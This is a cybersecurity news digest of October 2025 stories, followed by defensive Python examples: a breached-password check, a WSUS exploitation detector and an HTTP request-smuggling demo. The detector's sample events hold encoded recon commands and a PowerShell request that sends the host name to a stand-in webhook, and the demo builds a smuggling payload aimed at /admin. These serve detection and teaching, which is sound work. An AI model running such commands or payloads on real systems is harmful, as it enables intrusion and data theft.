Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11690
Checks for new stories every ~15 minutes
| Time | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-10-28 10:45:17 | theregister | DATA BREACH | Google Denies Claims of Massive Gmail Security Breach | Google refuted reports of a major Gmail breach affecting 183 million accounts, attributing the claims to misinterpretation of old credential data.
The confusion originated from the addition of a large dataset to Have I Been Pwned, collected from infostealer malware logs over several years.
This dataset, shared by Synthient, was mistakenly perceived as a new breach, though it reflects long-term infostealer activity rather than a targeted Gmail attack.
Google emphasized that Gmail's security remains robust, with proactive measures in place to scan for stolen credentials and prompt password resets.
The episode shows how quickly a re-labelled credential dump can circulate as a "new breach", and why careful interpretation of cybersecurity news matters if needless panic is to be avoided.
Users are advised to enable two-step verification, consider passkeys, and change any password that appears in a breach notification; because infostealer logs capture credentials as typed, a listed password should be treated as compromised on every site where it was reused. | Details |
| 2025-10-28 10:36:01 | thehackernews | VULNERABILITIES | Strengthening Google Workspace Security for Lean IT Teams | Many startups rely on Google Workspace, which prioritizes collaboration over security, posing risks for lean IT teams tasked with protection.
Key security practices include enforcing multi-factor authentication (MFA) and hardening admin access to prevent unauthorized account compromises.
Adjusting default sharing settings and controlling OAuth app access are crucial to mitigate data leaks and unauthorized access.
Email threats remain a significant concern; implementing robust detection and response mechanisms is essential to counter phishing and impersonation attacks.
Proactive monitoring and automated alerts can aid in detecting and containing account takeovers before they escalate.
Knowing which data in Workspace is sensitive, and classifying it, is a prerequisite for protecting it; the built-in data loss prevention (DLP) controls help, but the article describes them as limited.
Solutions like Material Security can enhance Google Workspace by providing advanced threat detection and unified security management. | Details |
| 2025-10-28 10:08:05 | theregister | MISCELLANEOUS | AI Chatbots Found Repeating Russian Propaganda in War-Related Queries | The Institute for Strategic Dialogue (ISD) examined responses from four major AI chatbots, revealing that Russian state-attributed content appeared in up to 25% of war-related queries.
Chatbots such as OpenAI's ChatGPT and Google's Gemini were tested across five languages, highlighting concerns over AI's potential role in spreading disinformation.
The study found that biased or malicious prompts significantly increased the likelihood of chatbots citing Kremlin-aligned sources, with ChatGPT showing a threefold increase in such cases.
Google's Gemini demonstrated the most effective safety measures, featuring fewer Kremlin-aligned sources and recognizing the risks of biased prompts.
The ISD's findings suggest that AI models can be manipulated to echo state-sponsored narratives, raising questions about the enforcement of EU regulations against Russian disinformation.
The study emphasizes the need for AI firms to implement stricter content moderation and scrutiny to prevent the dissemination of manipulated information.
With AI chatbots increasingly used as search engines, the potential impact on public perception and policy enforcement is significant, necessitating regulatory attention. | Details |
| 2025-10-28 10:08:04 | bleepingcomputer | MALWARE | New Herodotus Android Malware Evades Detection with Human-Like Typing | Herodotus is a new Android banking malware family that injects random delays into its automated text input so that its actions look like human typing to behavior-based anti-fraud systems.
Offered as malware-as-a-service, Herodotus targets Italian and Brazilian users via SMS phishing, exploiting a custom dropper to bypass Android 13's Accessibility restrictions.
The malware's 'humanizer' mechanism introduces random delays in text input, making automated actions appear more human-like to avoid behavior-based anti-fraud systems.
ThreatFabric, which identified the family, has seen it distributed by multiple threat actors, with seven distinct subdomains indicating its growing adoption in the wild.
Users are advised to avoid downloading APKs from untrusted sources and ensure Google Play Protect is active, while scrutinizing and revoking risky app permissions.
Herodotus' innovative delay tactic represents a novel challenge for current detection systems, emphasizing the need for enhanced behavioral analysis in cybersecurity strategies. | Details |
| 2025-10-28 08:36:14 | theregister | DATA BREACH | Marks & Spencer Cyber Incident Sparks Major IT Overhaul | Marks & Spencer replaced Tata Consultancy Services as its IT service desk provider after a procurement process that began in January, aiming to refresh its IT support infrastructure.
The decision to switch providers follows a significant cyber incident affecting M&S's operations, notably disrupting Click & Collect orders and impacting profits by an estimated £300 million.
The National Crime Agency arrested four individuals in connection with the attack, which targeted M&S and other British retailers over several weeks.
Despite the change in service desk providers, TCS continues to support other IT services for M&S, maintaining a strategic partnership.
M&S has gradually restored services, including Click & Collect, although some functionalities like Scan and Shop and online stock checking remain affected.
The cyber incident has prompted M&S to reassess its IT strategy, reflecting the ongoing challenges in securing retail operations against cyber threats.
TCS clarified that vulnerabilities did not originate from their networks, as they do not provide cybersecurity services to M&S, which are managed by another partner. | Details |
| 2025-10-28 08:26:14 | thehackernews | MALWARE | Chrome Zero-Day Exploited to Deploy Memento Labs' LeetAgent Spyware | Kaspersky identified a Chrome zero-day vulnerability (CVE-2025-2783) exploited to deliver LeetAgent spyware, developed by Italian firm Memento Labs, targeting Russian organizations.
The flaw, a sandbox escape in Chrome's Mojo IPC layer on Windows, was triggered when a target opened a personalized, short-lived phishing link in Chrome; it let the attackers run code outside the browser sandbox and deploy their espionage tools.
Operation ForumTroll, active since February 2024, targeted media, universities, research centers, and government bodies in Russia and Belarus, focusing on espionage.
Memento Labs was formed in 2019 when InTheCyber Group acquired the remains of Hacking Team, and like its predecessor it sells offensive cyber tools to government and law-enforcement customers.
The attack chain involved a validator script to verify genuine users, followed by exploitation of the zero-day to deploy the LeetAgent malware.
LeetAgent connects to command-and-control servers to execute tasks, with links to broader malicious activities dating back to 2022, involving phishing emails.
Positive Technologies and BI.ZONE also tracked the activity, noting connections between LeetAgent and the more sophisticated Dante spyware.
The campaign underscores the persistent threat posed by advanced spyware and the need for robust defenses against targeted phishing and zero-day exploits. | Details |
| 2025-10-28 04:10:10 | thehackernews | NATION STATE ACTIVITY | SideWinder Targets South Asian Diplomats with New ClickOnce Attack Chain | SideWinder has launched a new campaign targeting South Asian diplomats, including a European embassy in New Delhi, using a ClickOnce-based infection chain.
The attack spans multiple organizations in Sri Lanka, Pakistan, and Bangladesh, employing spear-phishing emails with malicious PDF and Word documents.
The campaign introduces the use of ModuleInstaller and StealerBot malware, enabling data collection, reverse shell access, and further malware deployment.
Attackers employ legitimate applications like MagTek's ReaderConfiguration.exe for side-loading malicious DLLs, complicating detection and analysis.
The phishing emails mimic official communications, using domains resembling the Ministry of Defense of Pakistan to enhance credibility.
SideWinder's tactics reflect an advanced understanding of geopolitical dynamics, tailoring lures to specific diplomatic targets in the region.
The campaign's persistence and sophistication highlight the ongoing threat posed by state-sponsored actors in geopolitical espionage activities. | Details |
| 2025-10-27 23:57:23 | theregister | VULNERABILITIES | Critical WSUS Vulnerability Exploited Despite Emergency Microsoft Patch | A critical vulnerability in Windows Server Update Services (WSUS), CVE-2025-59287, is actively exploited, affecting Windows Server versions 2012 through 2025.
The flaw enables unauthenticated attackers to execute arbitrary code, with exploitation observed across multiple organizations by a threat actor identified as UNC6512.
Microsoft's October Patch Tuesday update did not fully fix the flaw, prompting an emergency out-of-band patch; exploitation continues against servers that have not applied it, with roughly 100,000 exploitation attempts reported in a single week.
Attackers gain initial access and conduct reconnaissance using PowerShell commands, targeting publicly exposed WSUS instances on default TCP ports 8530 and 8531.
Exfiltration of data to remote endpoints has been observed, with the potential for attackers to push malicious software via the update service.
Trend Micro and Palo Alto Networks emphasize the vulnerability's catastrophic potential if WSUS is internet-exposed, urging rapid deployment of the out-of-band update; until it is applied, Microsoft's workarounds are to disable the WSUS server role where it is not needed and to block inbound traffic to TCP ports 8530 and 8531 at the host firewall.
The situation highlights challenges in patch management and the need for accountability in ensuring security patches effectively address vulnerabilities. | Details |
| 2025-10-27 20:36:29 | bleepingcomputer | DATA BREACH | Google Refutes Claims of Massive Gmail Data Breach Incident | Google addressed false reports claiming a breach of 183 million Gmail accounts, clarifying that no new security incident occurred.
The misinformation originated from a misunderstanding of a large collection of compromised credentials added to Have I Been Pwned, not a new breach.
This collection included credentials from various past incidents involving malware, phishing, and credential stuffing, affecting multiple platforms.
Google reassured users of Gmail's robust security measures and confirmed actions to protect accounts by resetting passwords when necessary.
The incident underscores the importance of accurate reporting, as sensationalized claims can cause unnecessary alarm and operational disruptions.
Users are advised to check Have I Been Pwned for potential exposure and to change passwords if their credentials appear in the collection.
The situation highlights ongoing challenges in managing credential security and the potential risks posed by recycled or exposed passwords. | Details |
| 2025-10-27 19:37:51 | bleepingcomputer | VULNERABILITIES | X Requires Re-enrollment of 2FA Security Keys by November 10 | X mandates users to re-enroll security keys for two-factor authentication (2FA) by November 10, or face account lockouts until compliance.
This requirement affects users employing passkeys or hardware-based security keys, such as YubiKeys, which offer phishing-resistant protection.
The change is due to X's migration from the twitter.com domain to x.com: WebAuthn credentials such as security keys and passkeys are bound at registration to a relying-party ID (the site's domain), so a key registered under twitter.com cannot produce a valid assertion for x.com.
Users must manually re-enroll their security keys by accessing x.com/settings/account/login_verification/security_keys and confirming their identity with a password.
Users who have not re-enrolled by the deadline will be locked out until they re-enroll the key, switch to a different 2FA method, or turn 2FA off entirely.
X emphasizes that this is not related to a security breach but is a technical necessity due to domain migration.
The initiative underscores the importance of maintaining updated security measures to ensure seamless user access and protection against phishing threats. | Details |
| 2025-10-27 19:24:57 | bleepingcomputer | CYBERCRIME | Ransomware Payments Decline as Companies Strengthen Defenses | Only 23% of ransomware victims paid attackers in Q3 2025, marking a continued decline in payment rates, as organizations enhance their cybersecurity measures and resist extortion demands.
Coveware's data shows a shift in ransomware tactics, with 76% of attacks involving data exfiltration, indicating a move away from solely encryption-based extortion.
Average and median ransomware payments decreased to $377,000 and $140,000, respectively, reflecting a strategic shift by enterprises to invest in preventive measures.
Ransomware groups like Akira and Qilin are targeting medium-sized firms, which are perceived as more likely to pay, accounting for 44% of attacks in the third quarter.
Remote access compromise and software vulnerabilities have become prevalent attack vectors, prompting a reevaluation of organizational security strategies.
As profits diminish, ransomware gangs are expected to increase precision in targeting, with a potential rise in social engineering and insider threats.
The Picus Blue Report 2025 reveals a significant increase in password cracking incidents, urging organizations to bolster password security and monitoring practices. | Details |
| 2025-10-27 16:59:14 | bleepingcomputer | VULNERABILITIES | QNAP Urges Immediate Patch for Critical ASP.NET Core Flaw | QNAP has issued an urgent advisory for users to patch a critical ASP.NET Core vulnerability affecting its NetBak PC Agent for Windows.
The flaw, identified as CVE-2025-55315, allows attackers to hijack credentials or bypass security controls via HTTP request smuggling.
This vulnerability, found in the Kestrel ASP.NET Core web server, poses significant risks, including unauthorized data access and server file modifications.
QNAP recommends users update their systems by reinstalling the NetBak PC Agent or manually updating ASP.NET Core components.
Microsoft previously addressed this flaw, marking it with the highest severity rating for an ASP.NET Core vulnerability.
Successful exploitation can lead to privilege escalation, bypassing CSRF checks, and potential denial-of-service conditions.
In addition to this advisory, QNAP recently patched multiple rsync vulnerabilities in its HBS 3 Hybrid Backup Sync solution. | Details |
| 2025-10-27 16:37:42 | bleepingcomputer | CYBERCRIME | Italian Spyware Vendor Memento Labs Linked to Chrome Zero-Day Exploits | Kaspersky identified Operation ForumTroll, exploiting a Chrome zero-day, targeting Russian organizations with malware linked to Italian vendor Memento Labs.
The campaign involved phishing emails with malicious links that triggered CVE-2025-2783, a sandbox escape in Chrome's Mojo IPC layer on Windows; Mozilla subsequently patched a similar IPC sandbox-escape pattern in Firefox as CVE-2025-2857.
Memento Labs, formed from the assets of the former Hacking Team, developed the Dante spyware, used in these attacks alongside LeetAgent malware.
Dante is a modular spyware with command execution, file operations, and data theft capabilities, but its full features remain undisclosed due to missing modules.
The malware self-deletes if no command-and-control communication occurs, complicating forensic analysis.
Chrome and Firefox have patched the exploited vulnerabilities, with updates released in March 2025.
Memento Labs has not responded to inquiries regarding its involvement in these cyber activities. | Details |
| 2025-10-27 16:26:28 | theregister | DATA BREACH | Data Breach at Iran's Ravin Academy Exposes Student Information | Ravin Academy, an Iranian institution linked to state-sponsored cyber activities, confirmed a data breach affecting its online platform, exposing personal information of students and associates.
Compromised data includes names, phone numbers, Telegram usernames, and in some cases, national ID numbers, potentially impacting individuals' privacy and security.
The breach was publicly disclosed via Ravin's Telegram channel, amidst claims of attempts to undermine Iranian cybersecurity credibility and national achievements.
UK-based activist Nariman Gharib obtained and published the leaked data, further amplifying the breach's visibility and potential reputational damage.
Ravin Academy, sanctioned by Western nations for its role in cyber operations, faces increased scrutiny due to its founders' alleged ties to Iran's Ministry of Intelligence and Security.
The incident underscores ongoing geopolitical tensions, with Iran's cyber activities remaining a concern despite being overshadowed by other nation-state threats like China and Russia.
The breach serves as a reminder of the persistent threat posed by state-linked cyber entities and the importance of robust security measures to protect sensitive information. | Details |
| 2025-10-27 16:18:03 | thehackernews | VULNERABILITIES | X Urges Security Key Users to Re-Enroll Before November Deadline | Social media platform X is advising users with security keys to re-enroll by November 10, 2025, to prevent account lockouts.
The re-enrollment is necessary because of the rebranding from Twitter to X: a security key is bound to the domain (relying-party ID) it was registered on, so credentials registered under twitter.com are not valid for x.com.
Users who fail to re-enroll will face account access issues unless they choose an alternative two-factor authentication (2FA) method.
The change is specific to users utilizing hardware security keys, not affecting those using authenticator apps for 2FA.
X's initiative aims to phase out the twitter[.]com domain, aligning security keys with the new x[.]com domain.
Text message-based 2FA remains available but has been restricted to Premium subscribers since March 2023.
The company's proactive approach emphasizes the importance of maintaining secure access through updated authentication methods. | Details |
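The two Gmail entries above tell users to check Have I Been Pwned and change any exposed password. The following is an added example, not code from either article or from HIBP, showing how the Pwned Passwords k-anonymity range API lets a client check a password without sending the password or its full hash: only the first five hex characters of the SHA-1 leave the machine. The live network call is included for reference, but the demo runs against a constructed fixture whose suffix lines and counts are made up; the SHA-1 of "password" (5BAA61E4...) is a known value.

```python
"""k-anonymity lookup against Pwned Passwords, as used to act on the
"check Have I Been Pwned" advice in the Gmail entries above.
Only the first five hex characters of the SHA-1 hash leave the machine;
the full hash (and the password) never do."""
from __future__ import annotations
import hashlib
import urllib.request

RANGE_URL = "https://api.pwnedpasswords.com/range/"


def sha1_hex(password: str) -> str:
    """Upper-case hex SHA-1, the digest Pwned Passwords indexes on."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def split_for_range(password: str) -> tuple[str, str]:
    """Return (5-char prefix sent to the API, 35-char suffix kept local)."""
    digest = sha1_hex(password)
    return digest[:5], digest[5:]


def parse_range_response(text: str) -> dict[str, int]:
    """Parse 'SUFFIX:COUNT' lines into a dict; tolerate blank lines."""
    counts: dict[str, int] = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        suffix, _, count = line.partition(":")
        counts[suffix.upper()] = int(count)
    return counts


def fetch_range_live(prefix: str) -> str:
    """Real API call (not used by the offline demo). Add-Padding asks the
    service to pad the response so its size does not leak the prefix."""
    req = urllib.request.Request(
        RANGE_URL + prefix,
        headers={"Add-Padding": "true", "User-Agent": "pwned-check-example"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(password: str, fetch_range=fetch_range_live) -> int:
    """Number of times the password appears in the corpus (0 = not found).
    Padded entries come back with count 0, so they never produce a hit."""
    prefix, suffix = split_for_range(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)


# --- constructed offline fixture (not real API data) ---------------------
# SHA-1("password") = 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8, so the
# API prefix is 5BAA6. The counts below are made up for the example.
_PW_PREFIX, _PW_SUFFIX = split_for_range("password")
_FIXTURE = {
    _PW_PREFIX: (
        "0018A45C4D1DEF81644B54AB7F969B88D65:1\n"
        f"{_PW_SUFFIX}:3861493\n"
        "00D4F6E8FA6EECAD2A3AA415EEC418D38EC:2\n"
    ),
}


def fetch_range_offline(prefix: str) -> str:
    """Stand-in for the network call so the example runs offline.
    Any other prefix gets a padded-looking response with no real hits."""
    return _FIXTURE.get(prefix, "0000000000000000000000000000000000A:0\n")


if __name__ == "__main__":
    for pw in ("password", "Tq7$vL9!xbWz2pHn"):
        n = breach_count(pw, fetch_range_offline)
        verdict = f"seen {n} times, change it" if n else "not in the sample corpus"
        print(f"{pw!r}: {verdict}")
```

To run it against the real service, pass nothing for `fetch_range` (the default is the live fetcher); the prefix is the only thing that reaches the API, and the comparison of the 35-character suffix happens locally.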
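For the WSUS entry above (CVE-2025-59287), an added detection sketch that is not from the article or from the vendors named in it. It assumes, based on public reporting of this exploitation, that the exploit's shell is spawned by the WSUS service process (wsusservice.exe) or the IIS worker (w3wp.exe) and that the reconnaissance runs as an encoded PowerShell command; the process-creation events are constructed, not real telemetry, and the field names follow Sysmon's Event ID 1.

```python
"""Detection sketch for the WSUS exploitation described above: the exploit
runs inside the WSUS service / IIS worker, so the tell is that process
spawning a shell, usually with an encoded PowerShell payload. Records below
are constructed, Sysmon-style process-creation events, not real telemetry."""
from __future__ import annotations
import base64
import re

# Parent images seen in public reporting of this exploitation (assumption:
# a starting point, not a complete list). A production rule would also tie
# w3wp.exe to the WsusPool application pool to cut general IIS noise.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
ENCODED_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{8,})", re.I)
RECON = ("whoami", "net user", "net group", "ipconfig", "nltest", "systeminfo")
EXFIL = ("invoke-webrequest", "invoke-restmethod", "curl ", "webhook")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str | None:
    """PowerShell's -EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> dict | None:
    """Return a finding for a shell spawned by a WSUS-related parent, else None."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    if parent not in WSUS_PARENTS or image not in SHELLS:
        return None
    script = decode_encoded_command(event["CommandLine"]) or event["CommandLine"]
    lowered = script.lower()
    tags = ["shell_from_wsus"]
    if any(k in lowered for k in RECON):
        tags.append("recon")
    if any(k in lowered for k in EXFIL):
        tags.append("possible_exfil")
    return {"host": event["Computer"], "parent": parent, "image": image,
            "script": script, "tags": tags}


def scan(events: list[dict]) -> list[dict]:
    return [f for f in (classify(e) for e in events) if f]


def ps_encode(script: str) -> str:
    """Builds the constructed sample the way an attacker encodes a payload."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (not real events).
SAMPLE_EVENTS = [
    {"Computer": "wsus01",
     "ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -enc "
                    + ps_encode("whoami; net user /domain; ipconfig /all")},
    {"Computer": "wsus01",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -EncodedCommand "
                    + ps_encode("Invoke-WebRequest -Uri https://example.invalid/webhook "
                                "-Method POST -Body $env:COMPUTERNAME")},
    {"Computer": "wsus01",  # benign: service start
     "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "CommandLine": "WsusService.exe"},
    {"Computer": "fs01",  # benign: interactive shell elsewhere
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{','.join(f['tags'])}] {f['host']}: {f['parent']} -> {f['image']}: {f['script']}")
```

The decode step matters: searching the raw command line for "whoami" misses the encoded form entirely, which is why the rule decodes the UTF-16LE base64 before keyword matching.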
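The QNAP entry above attributes CVE-2025-55315 to HTTP request smuggling in Kestrel. The following is an added illustration of that bug class, not a reproduction of the Kestrel flaw and not code from QNAP, Microsoft or the article: it splits the same byte stream under three framing policies and shows that a front end trusting Content-Length and a back end trusting Transfer-Encoding disagree about where the first request ends, which is what lets a hidden second request reach the back end. The payload is constructed.

```python
"""HTTP request smuggling, the bug class behind the Kestrel flaw in the QNAP
entry above: two parsers that pick different body lengths for the same bytes
let an attacker hide a second request inside the first. Generic illustration
of the class; it does not reproduce CVE-2025-55315."""
from __future__ import annotations


class AmbiguousFraming(ValueError):
    """Raised by the strict policy when a request's body length is ambiguous."""


def _parse_head(head: bytes) -> tuple[bytes, list[tuple[bytes, bytes]]]:
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def _read_chunked(data: bytes, pos: int, strict: bool) -> tuple[bytes, int]:
    """Decode a chunked body starting at pos; return (body, new_pos)."""
    body = b""
    while True:
        eol = data.index(b"\r\n", pos)
        size_field = data[pos:eol]
        if strict:
            # Hex digits only: no extensions, no whitespace, no sign.
            if not size_field or any(c not in b"0123456789abcdefABCDEF" for c in size_field):
                raise AmbiguousFraming(f"bad chunk size: {size_field!r}")
        else:
            size_field = size_field.split(b";", 1)[0].strip()  # lenient: drop extension
        size = int(size_field, 16)
        pos = eol + 2
        if size == 0:
            # Terminating chunk; skip any trailer lines up to the empty line.
            end = data.index(b"\r\n", pos)
            while end != pos:
                pos = end + 2
                end = data.index(b"\r\n", pos)
            return body, pos + 2
        body += data[pos:pos + size]
        if data[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk not CRLF-terminated")
        pos += size + 2


def split_stream(data: bytes, policy: str) -> list[tuple[bytes, bytes]]:
    """Split a byte stream into (request_line, body) pairs.

    policy: 'content-length' - on conflict, trust Content-Length (lenient front end)
            'chunked'        - on conflict, trust Transfer-Encoding (lenient back end)
            'strict'         - refuse any request whose framing is ambiguous
    """
    out, pos = [], 0
    while pos < len(data):
        head_end = data.index(b"\r\n\r\n", pos)
        request_line, headers = _parse_head(data[pos:head_end])
        pos = head_end + 4
        cls = [v for k, v in headers if k == b"content-length"]
        tes = [v for k, v in headers if k == b"transfer-encoding"]
        chunked = any(v.lower().endswith(b"chunked") for v in tes)
        if policy == "strict":
            if cls and tes:
                raise AmbiguousFraming("both Content-Length and Transfer-Encoding")
            if len(set(cls)) > 1:
                raise AmbiguousFraming("conflicting Content-Length values")
            if tes and not chunked:
                raise AmbiguousFraming("Transfer-Encoding without final chunked")
        use_chunked = chunked and (policy != "content-length" or not cls)
        if use_chunked:
            body, pos = _read_chunked(data, pos, strict=(policy == "strict"))
        elif cls:
            n = int(cls[0])
            body, pos = data[pos:pos + n], pos + n
        else:
            body = b""
        out.append((request_line, body))
    return out


def build_cl_te_payload() -> bytes:
    """Constructed CL.TE desync payload: Content-Length covers the whole
    remainder, but the chunked body ends at the '0' chunk."""
    smuggled = b"GET /admin HTTP/1.1\r\nHost: target\r\n\r\n"
    body = b"0\r\n\r\n" + smuggled
    head = (b"POST / HTTP/1.1\r\nHost: target\r\n"
            + b"Content-Length: %d\r\n" % len(body)
            + b"Transfer-Encoding: chunked\r\n\r\n")
    return head + body


if __name__ == "__main__":
    payload = build_cl_te_payload()
    for policy in ("content-length", "chunked", "strict"):
        try:
            print(policy, "->", [r[0] for r in split_stream(payload, policy)])
        except AmbiguousFraming as exc:
            print(policy, "-> rejected:", exc)
```

The strict policy is the fix for the class: a server that refuses ambiguous framing (CL plus TE, conflicting CLs, non-hex chunk sizes) cannot be desynchronized from whatever sits in front of it, whereas the two lenient policies are each reasonable on their own and only become a vulnerability when paired.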
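Both X entries above describe the lockout only in terms of security keys becoming "incompatible" with x.com. The following added example (not code from X or the articles; a toy model, not a WebAuthn library) shows the mechanism: a credential is scoped at registration to a relying-party ID, the authenticator looks credentials up by the hash of that RP ID, and the browser refuses an RP ID that is not a suffix of the page's origin, so neither the old key nor a site that keeps asking for twitter.com can work on x.com until the key is re-enrolled. The public-suffix check is simplified to "must contain a dot".

```python
"""Why X's domain move invalidates registered security keys: a WebAuthn
credential is scoped at registration to a relying-party ID (RP ID), and an
authenticator only produces an assertion for that exact RP ID.
Toy model of the client-side checks, not a WebAuthn implementation."""
from __future__ import annotations
import hashlib
import os
from urllib.parse import urlsplit


def rp_id_allowed_for_origin(rp_id: str, origin: str) -> bool:
    """Browser-side check: the RP ID must equal the origin's effective domain
    or be a registrable suffix of it. Real browsers consult the Public Suffix
    List; this toy version just refuses single-label values like 'com'."""
    parts = urlsplit(origin)
    if parts.scheme != "https" or not parts.hostname:
        return False
    host = parts.hostname.lower()
    rp_id = rp_id.lower()
    if "." not in rp_id:
        return False  # simplified public-suffix rule (assumption)
    return host == rp_id or host.endswith("." + rp_id)


def rp_id_hash(rp_id: str) -> bytes:
    """Authenticators key credentials by SHA-256(rp_id), as in authenticator data."""
    return hashlib.sha256(rp_id.lower().encode("ascii")).digest()


class ToyAuthenticator:
    """Holds credentials the way a security key does: by RP ID hash."""

    def __init__(self) -> None:
        self._creds: dict[bytes, list[bytes]] = {}

    def make_credential(self, rp_id: str) -> bytes:
        cred_id = os.urandom(16)
        self._creds.setdefault(rp_id_hash(rp_id), []).append(cred_id)
        return cred_id

    def get_assertion(self, rp_id: str, allow_list: list[bytes]) -> bytes | None:
        """Return a credential ID usable for rp_id, or None if the site's
        allow-list only names credentials scoped to some other RP ID."""
        usable = self._creds.get(rp_id_hash(rp_id), [])
        for cred_id in allow_list:
            if cred_id in usable:
                return cred_id
        return None


def login_with_key(auth: ToyAuthenticator, origin: str, rp_id: str,
                   allow_list: list[bytes]) -> bool:
    """Client flow: origin/RP ID check first, then ask the authenticator."""
    if not rp_id_allowed_for_origin(rp_id, origin):
        return False
    return auth.get_assertion(rp_id, allow_list) is not None


def migration_demo() -> dict[str, bool]:
    """Register under twitter.com, then try to log in after the move to x.com."""
    key = ToyAuthenticator()
    old_cred = key.make_credential("twitter.com")
    results = {
        # Worked before the migration.
        "twitter.com_before": login_with_key(key, "https://twitter.com", "twitter.com", [old_cred]),
        # Same key, same allow-list, new domain: the authenticator holds no
        # credential scoped to x.com, so the assertion fails.
        "x.com_old_key": login_with_key(key, "https://x.com", "x.com", [old_cred]),
        # x.com cannot keep asking for RP ID twitter.com either: the browser
        # rejects an RP ID that is not a suffix of the page's origin.
        "x.com_claims_twitter_rpid": login_with_key(key, "https://x.com", "twitter.com", [old_cred]),
    }
    # Re-enrollment creates a fresh credential scoped to x.com.
    new_cred = key.make_credential("x.com")
    results["x.com_after_reenroll"] = login_with_key(key, "https://x.com", "x.com", [new_cred])
    return results


if __name__ == "__main__":
    for step, ok in migration_demo().items():
        print(f"{step:28s} {'login ok' if ok else 'assertion refused'}")
```

The same scoping is what makes these credentials phishing-resistant: a look-alike domain cannot obtain an assertion for x.com any more than x.com could obtain one for twitter.com, so the re-enrollment cost is the price of the property the keys exist to provide.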